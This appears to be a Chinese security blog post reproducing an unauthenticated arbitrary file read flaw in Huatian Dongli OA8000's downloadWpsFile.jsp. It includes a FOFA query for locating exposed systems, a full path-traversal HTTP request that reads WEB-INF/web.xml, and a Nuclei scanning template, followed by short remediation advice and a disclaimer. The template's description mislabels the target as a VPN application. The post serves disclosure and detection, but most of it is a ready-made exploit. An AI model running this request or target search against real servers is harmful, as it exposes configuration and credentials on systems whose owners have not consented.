【漏洞复现】华天动力OA downloadWpsFile.jsp 任意文件读取

2024-08-11 08:38:42 浏览数 (2)

0x00 漏洞描述

华天动力OA是一款将先进的管理思想、管理模式和软件技术、网络技术相结台,为用户提供了低成本、高效能的协同办公和管理平台。 华天动力OA downoadWposFile,jsp 接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。

0x01 测绘工具

fofa: app=“华天动力-OA8000”

0x02 漏洞复现

代码语言:javascript复制
GET /OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/2
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

0x03 Nuclei检测脚本

代码语言:javascript复制
id: 华天动力OA downloadWpsFile.jsp 任意文件读取

info:
  name: 华天动力OA downloadWpsFile.jsp 任意文件读取
  author: admin
  severity: high
  description: This template detects file inclusion vulnerability in the VPN application.
  tags: file-inclusion, lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml"

    headers:
      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0"
      Accept: "text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
      Accept-Language: "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
      Accept-Encoding: "gzip, deflate, br"
      Connection: "close"

    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "xml"

0x04 修复建议

建议在漏洞修复前尽量避免将系统暴露在互联网上或通过白名单限制访问 及时升级到最新版本: http://bj.oa8000.com/

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

0 人点赞